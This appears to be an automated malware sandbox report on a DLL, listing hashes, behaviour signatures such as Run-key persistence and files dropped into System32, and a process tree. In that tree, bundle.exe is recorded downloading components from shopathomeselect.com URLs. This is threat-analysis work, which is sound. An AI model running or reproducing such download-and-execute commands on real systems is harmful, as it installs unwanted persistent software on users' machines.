Overview

overview

7

Static

static

3

d5ae71e610...d7.dll

windows7-x64

7

d5ae71e610...d7.dll

windows10-2004-x64

7

Analysis

  • max time kernel
    149s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19-03-2024 08:39

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    d5ae71e6109ad99590a2b3ec2d2f55d7.dll

  • Size

    96KB

  • MD5

    d5ae71e6109ad99590a2b3ec2d2f55d7

  • SHA1

    5e1088bdcd5eca984f6546296aaae41b6180b66d

  • SHA256

    bb14e2647c19bc26b2cbaa537795aaa9cb0c3959cadfc6c78564d3603714cb86

  • SHA512

    394f03eb0ffd879d8d8fa56825b934e67e103d756ce0f71f08f7c9bd464a20e2dbc3681c9b050b229620245f3b4510fc2aeea6c31c958f282a5ebf04c362c5dc

  • SSDEEP

    1536:IflEc8naP2D22/muSD6d68BrJOx2LednhYxN0CcjwwDvx:I5g22/dBrJOMLkOf+N7x

Score
7/10
persistence

Malware Config

Signatures

  • Executes dropped EXE 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Drops file in System32 directory 1 IoCs
  • Modifies registry class 10 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Windows\system32\regsvr32.exe
    regsvr32 /s C:\Users\Admin\AppData\Local\Temp\d5ae71e6109ad99590a2b3ec2d2f55d7.dll
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4812
    • C:\Windows\SysWOW64\regsvr32.exe
      /s C:\Users\Admin\AppData\Local\Temp\d5ae71e6109ad99590a2b3ec2d2f55d7.dll
      2⤵
      • Drops file in System32 directory
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:3216
      • C:\Windows\SysWOW64\sahagent1003.exe
        "C:\Windows\System32\sahagent1003.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:3120
        • C:\Users\Admin\AppData\Local\Temp\bundle.exe
          "C:\Users\Admin\AppData\Local\Temp\bundle.exe" download1.shopathomeselect.com/agent/mindset1003.sah#bunSetup.cab#download1.shopathomeselect.com/agent/bunSetup.cab#www.shopathomeselect.com/agent/agentprefs.sah
          4⤵
          • Executes dropped EXE
          • Adds Run key to start application
          PID:4772
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3476 --field-trial-handle=2260,i,3303482231723870786,2954015409682154873,262144 --variations-seed-version /prefetch:8
    1⤵
      PID:5056

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\bundle.exe
      Filesize

      76KB

      MD5

      12b77b012ec72a0dfdc311b0f46de641

      SHA1

      52efa989341f778626da592915048a280c1a305f

      SHA256

      ab995fdb0470311ffb79b1163e78ad4506fe89881c3fc92994bfc99b2e2351fa

      SHA512

      9f2cf0e249e1f35aea96e23e5c5f66ef83b321f0519fa0d6a5e73e25ca6977bd4ae3fd9baceba3237b602335a422b96af6e00cabf17a7ba0f7f50dd99b782a1a

      Download Submit

    • C:\Windows\SysWOW64\sahagent1003.exe
      Filesize

      72KB

      MD5

      82344899bc34ce448a909f5bb7c56e5c

      SHA1

      52ec80cdd38415c5d67afee75c46ef3523fb4ceb

      SHA256

      e12d3e05d4c5f68b1a116c60e6f4c1b3235fdb1a7171e44c05847ccfe3972c44

      SHA512

      ef5be92a5e85951bb5a64f471d1c9fee1fb644a1716ab147356dd811e284f3567c7e0a7457de1290d0b9ad5ea594ca4c9d670abed4dd2e3e599bc4c5cd069e8b

      Download Submit